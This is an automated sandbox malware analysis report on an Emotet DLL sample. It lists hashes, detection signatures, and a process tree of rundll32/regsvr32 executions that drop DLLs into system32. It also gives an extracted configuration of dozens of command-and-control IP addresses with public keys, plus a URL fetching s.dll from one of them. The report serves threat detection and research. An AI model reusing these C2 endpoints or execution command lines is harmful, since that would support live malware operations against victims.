Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gdazhx1EIP.dll

Overview

General Information

Sample Name:gdazhx1EIP.dll
Analysis ID:745034
MD5:6b304d058ae0788762f8924d2cad7ef5
SHA1:f416b3c02d4f1746f8a642af253ee0d903b7b083
SHA256:5b2039d5a1ba30d90ecd085eb135635f9830f4ae88472e779267e033f7eb4547
Tags:dllexe
Infos:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Registers a DLL
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5216 cmdline: loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5420 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 4820 cmdline: rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 3324 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AEDSEwQF\PBid.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5408 cmdline: regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 408 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SwzTtIAmqdPBna\Ntrjg.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 5428 cmdline: rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • regsvr32.exe (PID: 5032 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GQmyGle\ScmiHVadtyVtThN.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4852 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NTIufvJuRVPL\QYaWGzhqdb.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 3548 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\AEDSEwQF\PBid.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3196 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\Zyymwn\eKUKMW.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0fyv0sgAeAIA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWGivTsgAlAIA="]}
SourceRuleDescriptionAuthorStrings
00000013.00000002.422527105.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000004.00000002.273153768.000001E1DA4C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.276448850.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000005.00000002.275026847.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            3.2.regsvr32.exe.9c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              5.2.rundll32.exe.25817df0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0.2.loaddll64.exe.1b000100000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.9c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.1e1da4c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.3115.178.55.2249698802404304 11/13/22-18:01:59.432679
                      SID:2404304
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: gdazhx1EIP.dllVirustotal: Detection: 43%Perma Link
                      Source: 00000006.00000002.651415248.0000000000B28000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0fyv0sgAeAIA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWGivTsgAlAIA="]}
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123E9410 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00007FFC123E9410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123E9410 CryptStringToBinaryA,CryptStringToBinaryA,3_2_00007FFC123E9410
                      Source: gdazhx1EIP.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DC334 FindFirstFileExW,0_2_00007FFC123DC334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC123DC334 FindFirstFileExW,3_2_00007FFC123DC334

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49698 -> 115.178.55.22:80
                      Source: Malware configuration extractorIPs: 172.105.115.71:8080
                      Source: Malware configuration extractorIPs: 218.38.121.17:443
                      Source: Malware configuration extractorIPs: 186.250.48.5:443
                      Source: Malware configuration extractorIPs: 103.71.99.57:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 85.25.120.45:8080
                      Source: Malware configuration extractorIPs: 139.196.72.155:8080
                      Source: Malware configuration extractorIPs: 103.85.95.4:8080
                      Source: Malware configuration extractorIPs: 198.199.70.22:8080
                      Source: Malware configuration extractorIPs: 209.239.112.82:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 36.67.23.59:443
                      Source: Malware configuration extractorIPs: 104.244.79.94:443
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 103.56.149.105:8080
                      Source: Malware configuration extractorIPs: 80.211.107.116:8080
                      Source: Malware configuration extractorIPs: 93.104.209.107:8080
                      Source: Malware configuration extractorIPs: 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 202.28.34.99:8080
                      Source: Malware configuration extractorIPs: 178.62.112.199:8080
                      Source: Malware configuration extractorIPs: 114.79.130.68:443
                      Source: Malware configuration extractorIPs: 118.98.72.86:443
                      Source: Malware configuration extractorIPs: 103.41.204.169:8080
                      Source: Malware configuration extractorIPs: 178.238.225.252:8080
                      Source: Malware configuration extractorIPs: 83.229.80.93:8080
                      Source: Malware configuration extractorIPs: 46.101.98.60:8080
                      Source: Malware configuration extractorIPs: 82.98.180.154:7080
                      Source: Malware configuration extractorIPs: 87.106.97.83:7080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 139.59.80.108:8080
                      Source: Malware configuration extractorIPs: 103.224.241.74:8080
                      Source: Malware configuration extractorIPs: 103.254.12.236:7080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 165.22.254.236:8080
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 51.75.33.122:443
                      Source: Malware configuration extractorIPs: 128.199.217.206:443
                      Source: Malware configuration extractorIPs: 188.165.79.151:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 160.16.143.191:8080
                      Source: Malware configuration extractorIPs: 175.126.176.79:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 103.126.216.86:443
                      Source: Malware configuration extractorIPs: 190.145.8.4:443
                      Source: Malware configuration extractorIPs: 128.199.242.164:8080
                      Source: Malware configuration extractorIPs: 64.227.55.231:8080
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewIP Address: 172.105.115.71 172.105.115.71
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: unknownNetwork traffic detected: IP country count 20
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: regsvr32.exe, 00000006.00000003.512958188.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513284500.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.653012507.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000006.00000003.513336296.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513040948.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.653625797.0000000000BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
                      Source: regsvr32.exe, 00000006.00000002.652463678.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513260146.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513417805.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000006.00000003.512958188.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513284500.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.653012507.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.512958188.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513284500.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.653012507.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabxt
                      Source: regsvr32.exe, 00000006.00000003.513448878.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/mcxnkbajti/
                      Source: regsvr32.exe, 00000006.00000002.652463678.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513260146.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513417805.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/s.dll

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.25817df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1b000100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e1da4c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1e1da4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.ef0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1b000100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.25817df0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.422527105.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.273153768.000001E1DA4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.276448850.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.275026847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.279054004.000001B000100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.272245824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.423610573.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.651143469.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.275144208.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.659348475.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.276265667.0000025817DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\AEDSEwQF\PBid.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeFile created: C:\Windows\system32\NTIufvJuRVPL\Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123E3FB00_2_00007FFC123E3FB0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DA3700_2_00007FFC123DA370
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DC3340_2_00007FFC123DC334
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123DABC00_2_00007FFC123DABC0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC123E19100_2_00007FFC123E1910
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800204540_2_0000000180020454
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028C940_2_0000000180028C94
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038A50_2_00000001800038A5
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800248E00_2_00000001800248E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800091440_2_0000000180009144
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB40_2_0000000180005DB4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004DDC0_2_0000000180004DDC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B1E00_2_000000018000B1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009E380_2_0000000180009E38
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003BE80_2_0000000180003BE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009BEC0_2_0000000180009BEC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800173F80_2_00000001800173F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017BF80_2_0000000180017BF8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800154000_2_0000000180015400
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800010000_2_0000000180001000
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000741C0_2_000000018000741C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E8280_2_000000018000E828
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800028340_2_0000000180002834
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180014C480_2_0000000180014C48
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002005C0_2_000000018002005C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800164640_2_0000000180016464
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800054780_2_0000000180005478
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800068800_2_0000000180006880
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002748C0_2_000000018002748C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001308C0_2_000000018001308C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800240980_2_0000000180024098
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B8980_2_000000018001B898
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000C4980_2_000000018000C498
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004CA00_2_0000000180004CA0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800110AC0_2_00000001800110AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800148B00_2_00000001800148B0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800078B60_2_00000001800078B6
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001CCC0_2_0000000180001CCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B8D00_2_000000018000B8D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800198DC0_2_00000001800198DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038DC0_2_00000001800038DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800264F80_2_00000001800264F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800084F80_2_00000001800084F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BD000_2_000000018000BD00
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800155080_2_0000000180015508
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018D0C0_2_0000000180018D0C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800121100_2_0000000180012110
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B5200_2_000000018001B520
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800291240_2_0000000180029124
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800135240_2_0000000180013524
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009D240_2_0000000180009D24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023D280_2_0000000180023D28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800021280_2_0000000180002128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800209300_2_0000000180020930
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F5500_2_000000018001F550
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180020D540_2_0000000180020D54
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800109540_2_0000000180010954
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800185600_2_0000000180018560
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E5700_2_000000018000E570
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C9740_2_000000018001C974
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000F1740_2_000000018000F174
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180025D840_2_0000000180025D84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800055900_2_0000000180005590
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800171980_2_0000000180017198
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800159A00_2_00000001800159A0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180011DAC0_2_0000000180011DAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1AC0_2_000000018000D1AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800069C00_2_00000001800069C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000A1D40_2_000000018000A1D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800079D80_2_00000001800079D8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C1DC0_2_000000018001C1DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1E00_2_000000018000D1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800199E80_2_00000001800199E8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800099EC0_2_00000001800099EC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028A040_2_0000000180028A04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001FA080_2_000000018001FA08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E6140_2_000000018001E614
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001A1C0_2_0000000180001A1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BA240_2_000000018000BA24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180021A2C0_2_0000000180021A2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800192300_2_0000000180019230
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BE340_2_000000018000BE34
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800122440_2_0000000180012244
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800066500_2_0000000180006650
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800016600_2_0000000180001660
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800116640_2_0000000180011664
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001827C0_2_000000018001827C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800246800_2_0000000180024680
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022A840_2_0000000180022A84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000AE840_2_000000018000AE84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800286900_2_0000000180028690
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800156940_2_0000000180015694
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800076940_2_0000000180007694
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800136980_2_0000000180013698
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800092980_2_0000000180009298
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002629C0_2_000000018002629C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001629C0_2_000000018001629C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000569C0_2_000000018000569C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180027EA40_2_0000000180027EA4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800096B80_2_00000001800096B8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000EAC40_2_000000018000EAC4
